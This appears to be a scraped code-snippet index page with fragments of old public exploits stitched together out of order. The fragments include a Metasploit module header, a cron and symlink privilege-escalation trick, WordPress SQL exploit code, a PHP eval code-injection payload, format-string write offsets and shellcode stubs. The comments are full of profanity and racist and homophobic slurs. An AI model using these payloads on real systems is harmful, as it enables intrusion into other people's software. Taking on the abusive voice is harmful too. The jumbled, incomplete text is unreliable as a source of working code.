Repositories (1)

29 snippets stored for this repo
if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
printf("Send failed pussy\n");
#!/usr/bin/perl -w

#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs

package Msf::Exploit::EiQ_License_494; 
use base "Msf::Exploit";
use strict;
'Name'           => 'doubletake Overflow',
			'Description'    => %q{
					This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded
					as hp storage works Vulnerability found by Titon of Bastard Labs.
			'Author'         => [ 'ri0t <ri0t[at]>' ],
			'Version'        => '$Revision: 9 $',
Perl IconPerl
system("echo '* * * * * /usr/bin/id > /tmp/aa' > /tmp/user_cron");
system("crontab /tmp/user_cron");

# The umask is where the lovin occurs. I'm rw-rw-rw James bitch!!
system("ln -s $dest /tmp/output");
sleep 60;   # Probably don't need to wait this long but whatever...
# One of the most sloppy, unreliable and awkward exploits ever released for
    # Wordpress. The original exploit from Stefan Esser was mediocre at best.
    # No offense meant, it was just a seriously deficient piece of horse shit.
    def exploit_205_trackback_utf7
        wpuser_list = {}
        sql_query = ""
*          888                                                   
 *          888                                                   
 *          888                      DID YOU EVER FEEL THE RUSH...
 *                     d8b d8b              ...FOR JIZZ?     
 *                     Y8P Y8P
 *                    8888 888 88888888 88888888
Perl IconPerl
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ;

exec '/tmp/shell' ;
'enableRefererCheck'	=> '0',
			'enableAgentCheck'	=> '0',
			'agents'		=> 'Mozilla.Opera.Lynx.Mosaic.amaya.WebExplorer.IBrowse.iCab',
			'nonos'			=> 'fuck.asshole',
			'update'		=> 'Update'
# <= (vulnerable) ?
# This is some fairly blatant and retarded use of system()
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you cay system() !
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all
//template_name varchar(30) NOT NULL,
#define FAKE_TEMPLATES_NAMES "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"
#define SQL_FAKE_TEMPLATES_3 "\', \'FI Black\', \'fiblack.css\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\',
http << argv[3];
        http << "&nigga=";
        http << phpcode;
Perl IconPerl
# (#social)
# 0dd: much <3 & respect
# Coming out of retirement slowly but surely... damn I'm rusty... 
# who's got some WD40? BSS overflow... mmmhmmm...
# ??/??/02 - First exploited OSH but though no one used it
Perl IconPerl
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents.
if (!(file) || ((target == -1) && (addr)))
    usage (argv[0]);
  if (strchr(file,'/'))
   { printf("NO fucking slashes douchebag\n"); exit(-1); }
  if (strlen(file) > MAX_FILENAME)
   { printf("Smaller filename please, unless you feel like editing the shell code\n");exit(-1); }
**          t12 - <[email protected]>                                       **
**                                                                          **
**     greetz go out to aempirei, a gun toatin' gangstah' hustler' player   **
**     motherfucker who isn't with us anymore, miah, who's GTA2 game was    **
**     was most entertaining tonight, Cathy, who provided the trippy light  **
**     to stare at, and to KT, for providing me with hours of decent        **
**     conversation.                                                        **
#--[ D3vil-0x1 | Devil-00 ]--#
#               Div The PHP Security Fucking Tool :D

##-- Start --#
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit	    *	
#                written by lammat 			   *
#    		          *
#		[email protected]			 *						
#	      Discovered by Kevin Walsh                 *
#   A Buffer overrun has been detected which has corrupted the program's
#   internal state. The program cannot safely continue execution and must
#   be now terminated.
#                                                   Bah fucking shame..
#o/s info: win xp sp.2  Media Center 11.0.309 (not registered)
#                       \\ DEBUG INFO //
$pay17 =  0xff + $seteuid[1][0];  
$pay18 = 0xff + ($seteuid[1][1] - $pay17); 
$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18  )  ; 
$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ;   # Something is fucking this write up... subtracting 0x8138 seems to help 

# The offset is off by 6 if you are trying to debug this in gdb
$format =
## P.S. this code public after was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
## $dbname   = "ccteam_phpbb2";

# rgod u fucking little piece of shit faggot. way to ruin a private exploit, scumbag

use strict;
use IO::Socket;
use MIME::Base64;
} else {

                               print "Bad luck.. Check your karma,
seriously..Where is my fucking latte!?!?\np.s. No info about backups was
found :(";

int arch=0;
char *command=0;

/* these two dns routines from dspoof/jizz */

/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
Perl IconPerl
# Exploit Title: [Terminal Server Client .rdp Dos ]
# Date: [2011-02-01]
# Author: [D3V!L FUCKER]
# Software Link: [sudo apt-get install tsclient] ^_^
# Version: [All Version]
# Tested on: [ubuntu 10.10]
Perl IconPerl
# Exploit Title: [Real Player Local Crash Poc]
# Date: [2010/01/09]
# Author: [D3V!L FUCKER]
# Software Link: []
# Version: []
# Tested on: [windows XP sp2]
Perl IconPerl
# Exploit Title: [Nero Express7 Local Heap Poc]
# Date: [2010/01/01]
# Author: [D3V!L FUCKER]
# Version: [Nero Express7 Ver.]
# Tested on: [windows vista sp0]
#After Setup Open Nero StartSmart Essentials => Favorites => Open Projects => explit.nir
Perl IconPerl
# Author: [D3V!L FUCKER]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";

Perl IconPerl
#tested on: xp sp3 (EN)
#bug date:August 06 09
#greetz:hack4love ,devil fucker ,angel
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
my $shellcode =